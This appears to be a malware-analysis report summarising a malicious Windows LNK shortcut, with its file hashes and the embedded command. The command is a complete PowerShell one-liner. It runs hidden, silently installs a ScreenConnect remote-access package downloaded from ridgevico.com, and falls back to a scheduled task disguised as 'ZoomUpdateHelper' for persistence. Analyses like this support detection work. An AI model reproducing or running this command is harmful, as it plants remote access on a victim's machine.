Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
8bca62ec55d3f0a8870fb630f58e12b8
Sha1
d45b50833624bfe7297fb93c0483fb0f38c46737
Sha256
d1e6e3515ab24c3403845bb89e0cebb1fff721632735dee1fe92e7be261a8d22
Sha384
bd414be2be89d59aeb800a99afe98546ca9b21e23688f81c684828a7870e2044f0a70c4ff47c8286c9cfe36d596d89e1
Sha512
548a8ecb0e9f694d458059540b1c8f19f5d748525320dcf48f2afce99cae7ea31c34377e855fb87862bcecca55983fc7643414f1ea074033ac202fd26a5b2018
SSDeep
48:93IQ/HrVVeTWmQnohNKa19ByChioh4aQQVqlx0I72/Ho:FIQ/HClzDXyiVQgyGI72/Ho
TLSH
2C310A22697DB84CD461E7F68B7D23BF465AA5F38C8DA1D1220AFAF21C066C006305C4
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command $u='https://ridgevico.com/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest'; $msiArgs=@('/i',$u,'/qn','/quiet','/norestart','REBOOT=ReallySuppress'); $hide=Join-Path $env:APPDATA 'Zoom\Plugins'; if(-not(Test-Path $hide)){New-Item -ItemType Directory -Path $hide -Force|Out-Null}; $ok=$false; foreach($try in 1..3){ $p=Start-Process msiexec.exe -ArgumentList $msiArgs -Verb RunAs -Wait -PassThru -WindowStyle Hidden; if($p.ExitCode -eq 0 -or $p.ExitCode -eq 3010){$ok=$true;break}; Start-Sleep -Seconds 8 }; if(-not $ok){ $a=New-ScheduledTaskAction -Execute 'msiexec.exe' -Argument ($msiArgs -join ' '); $t=New-ScheduledTaskTrigger -AtLogOn; $s=New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable; Register-ScheduledTask -TaskName 'ZoomUpdateHelper' -Action $a -Trigger $t -Settings $s -RunLevel Highest -Force|Out-Null }; exit

8bca62ec55d3f0a8870fb630f58e12b8 (1.61 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙